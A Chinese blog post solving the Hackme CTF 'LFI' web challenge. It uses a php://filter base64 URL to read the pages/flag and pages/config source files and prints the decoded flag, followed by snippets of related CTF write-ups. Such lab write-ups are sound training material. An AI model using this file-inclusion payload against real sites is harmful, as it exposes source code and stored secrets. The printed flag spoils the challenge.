【Hackme CTF】Web--LFI

最新推荐文章于 2025-10-08 15:16:02 发布
原创 最新推荐文章于 2025-10-08 15:16:02 发布 · 1.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了LFI(本地文件包含)漏洞的利用方法,通过实战案例展示了如何使用php://filter读取本地文件,最终获取flag。文章揭示了安全防护中关于文件包含的重要注意事项。

Description:

What this admin’s password? That is not important at all, just get the flag.

Tips: LFI, php://filter

Solution:

其实见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本地文件
https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag
发现网页出现一行base64
Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K
base64解码得
Can you read the flag<?php require('config.php'); ?>?
所以写网址为
https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config
得到base64
PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==
base64解码得

<?php
    $flag = "FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}";

Flag:

FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}

[GKCTF 2021]hackme
cjdgg的博客
11-21 2690
[GKCTF 2021]hackme 进入题目后,题目如上所示,查看页面源代码 提示nosql,这里推荐WHOAMI大佬的文章 这里源代码我们也看到了php头,那我们就看大佬文章里php中的nosql注入部分就行 这里数据包是json格式,我们试一下重言式注入 被过滤了,提示也说了,可以用Unicode绕过 成功绕过,这里放的是ne,意思为不等于,可以再试试eq,我把用户名的换成了eq,可以看到这个报错,应该是用户名对了,密码不对(ne和eq前面要有$符号的,csdn不知道为啥写不出来) 既然如此
逆向攻防世界CTF系列32-hackme
LH1013886337的博客
11-15 303
v16就是我们的输入,v10没有说,可以猜出来是下标,追踪byte_6B4270。
008_Web安全攻防实战:本地文件包含(LFI)漏洞深度分析与利用指南
欢迎来到智能安全前线!这里是AI与信息安全交汇之地。我们以代码为武器,深入大模型攻防实战,破解系统漏洞。追踪OpenAI、Meta前沿动态,用红蓝对抗思维,锻造智能时代的坚盾与利矛。
10-08 898
本地文件包含(Local File Inclusion,简称LFI)是一种常见的Web应用程序漏洞,它允许攻击者通过操纵文件路径参数来读取或执行Web服务器上的敏感文件。与远程文件包含(RFI)不同,LFI仅涉及服务器本地的文件,这使得它在没有外部连接的环境中仍然具有危害性。2025年最新的Web安全报告显示,LFI漏洞仍然是影响Web应用程序安全的主要问题之一,尤其在内容管理系统和自定义Web应用中频繁出现。
【靶机渗透】HACKME: 1
weixin_47443077的博客
06-20 413
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 文章目录【靶机渗透】HACKME: 10x01靶机介绍1. 详情2. 描述0x02环境搭建1. 下载靶机2. 创建靶机3. 开启靶机0x03靶机渗透1. 主机发现2. 端口扫描3. 服务扫描4. web信息收集0x04漏洞利用1.SQL注入2.文件上传3.反弹shell4.提权 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1
Hackme CTFWeb--scoreboard
VZZmieshenquan的博客
04-21 623
Description: DO NOT ATTACK or SCAN scoreboard, you don’t need to do that. Solution: 抓包发现flag在x-flag头里 Flag: FLAG{Header can hide some data aswell.}
ctf本地包括_南邮大学CTF web LFI本地文件包含解题思路
weixin_39633781的博客
12-19 404
0x00 php://filter简单理解:php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西;使用不同的参数可以达到不同的目的和效果:名称 描述 备注resource=指定了你要筛选过滤的数据流。必选read=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选write...
### CTF-All-In-One 超全学习文档资料
04-13
内容概要:本文档《ctf-all-in-one.pdf》是一份全面的CTF(夺旗赛)学习指南,涵盖了CTF的基础知识、各类题型、常用工具、高级技术和实战技巧。文档首先介绍了CTF的概念及其发展历史,解释了CTF比赛的形式和规则,...
ctf-all-in-one
01-30
ctf-all-in-one
CTFweb-SSTI学习笔记
最新发布
11-18
自己做的笔记,不喜勿喷
ctfhub-web-ssrf通关攻略
qq_64470109的博客
03-09 1231
题目提示我们访问本机的flag.php,那我们便去访问一下OK,出来结果。
ctf-all-in-one.pdf
08-24
ctf-all-in-one
LFI_autoexploiter:自动利用LFI Web漏洞。 它能够使用base64提取,空字节绕过和URL编码绕过
03-11
LFI_autoexploiter 自动利用LFI Web漏洞。 安装 就像这样简单:git clone 用法 用法:lfi_extractor.py [-h] [-URL URL] [-path_list PATH_LIST] [--b64 B64] [--url_enc URL_ENC] [--null NULL] [--output OUTPUT] [--static STATIC] [ --dynamic DYNAMIC] 可选参数: -h,--help显示此帮助消息并退出 -url URL示例: : -path_list PATH_LIST要提取的LFI文件的路径。 在扫描模式下不需要 --b64 B64如果给定1,则使用php base64提取 --url_enc URL_ENC如果给定1,则使用url编码 --null NULL如果给定1,则添加一个空字节 --
Hackme CTFWeb--hide and seek
VZZmieshenquan的博客
04-21 727
Description: Can you see me? I’m so close to you but you can’t see me. Solution: 点开网址 https://hackme.inndy.tw/ 查看页面源代码,拉到最底端看到flag Flag: FLAG{0h U C meeeeeeeeeeeeeeeeeeee!} ...
云演 CTF Web题型 lfi 文件包含
cadandme的博客
01-22 3214
文件包含 打开页面,典型的文件包含,文件包含的读取格式如下: ?file=php://filter/read=convert.base64-encode/resource=flag 读取到base64编码再解码,就得到 因为解码后还有url编码存在,谨慎起见,放到URL解码,得到真正的flag ...
hackme ctf-re
qq_43605837的博客
04-26 458
hackme总结: 首先得到反编译的代码就很简单: __int64 sub_400F8E() { char v1[136]; // [rsp+10h] [rbp-B0h] int v2; // [rsp+98h] [rbp-28h] char v3; // [rsp+9Fh] [rbp-21h] int v4; // [rsp+A0h] [rbp-20h] unsigned _...
XCITC-WEB-LFI(本地文件包含漏洞)
Home to come
04-12 737
php://filter协议 php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取 php://filter/read=<读链需要应用的过滤器列表>,同样write是写链 这个参数采用一个或以管道符 | 分隔的多个过滤器名称。 <?php /* 这会以大写字母输出 www.example.com 的全部内容 */ r...
Tryhackme Mr Robot CTF
dlccom的博客
12-02 575
Tryhackme Mr Robot CTF
Hackme CTF】Crypto--r u kidding
VZZmieshenquan的博客
01-22 672
Description: EKZF{Hs’r snnn dzrx, itrs bzdrzq bhogdq} Solution: 看密文知道应该是凯撒加密 Flag: FLAG{It’s tooo easy, just caesar cipher}
Hackme CTF】Crypto--easy
VZZmieshenquan的博客
01-22 691
Description: 526b78425233745561476c7a49476c7a4947566863336b7349484a705a3268305033303d Solution: HEX解码获得一段base64 RkxBR3tUaGlzIGlzIGVhc3ksIHJpZ2h0P30= 然后base64解码获得flag Flag: FLAG{This is easy, ri...
CTFweb-study
03-12
### CTF Web 安全挑战的学习资源 对于希望深入理解并参与CTF(夺旗竞赛)Web安全挑战的人来说,获取高质量的学习材料至关重要。这些资源不仅帮助参与者掌握基础概念和技术细节,还提供了实践机会来应用所学知识。 #### 推荐书籍与在线课程 一些优秀的书籍和在线平台专注于教授Web漏洞挖掘技巧以及防御措施。例如,《Web Application Hacker's Handbook》全面介绍了各种攻击向量及其对应的防护策略;Coursera上的《Cybersecurity Specialization》系列课程也涵盖了大量有关网络攻防的知识点[^1]。 #### 实践练习网站 为了更好地准备比赛中的实际操作部分,建议访问专门设计用于训练的安全测试环境。像HackTheBox、Try Hack Me这样的站点提供了一系列难度渐进的任务场景供玩家探索,而PWNABLE则更侧重于二进制逆向工程等方面的能力培养[^2]。 #### 社区交流论坛 加入活跃的技术讨论群组能够加速个人成长过程。Reddit下的r/netsec板块汇聚了许多信息安全爱好者分享见解;还有官方CTF赛事主办方设立的Discord服务器也是不错的选择之一,这里可以找到志同道合的朋友共同探讨难题解决方案。 ```python import requests def fetch_ctf_challenges(): url = 'https://example.com/challenges' response = requests.get(url) if response.status_code == 200: challenges = response.json() return challenges['data'] else: raise Exception('Failed to load data') challenges = fetch_ctf_challenges() print(challenges[:5]) # 打印前五个挑战题目概要信息 ``` 此段Python代码展示了如何通过API接口获取某一站点发布的最新CTF挑战列表,并打印其中部分内容作为示例展示给读者了解可能存在的交互形式。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值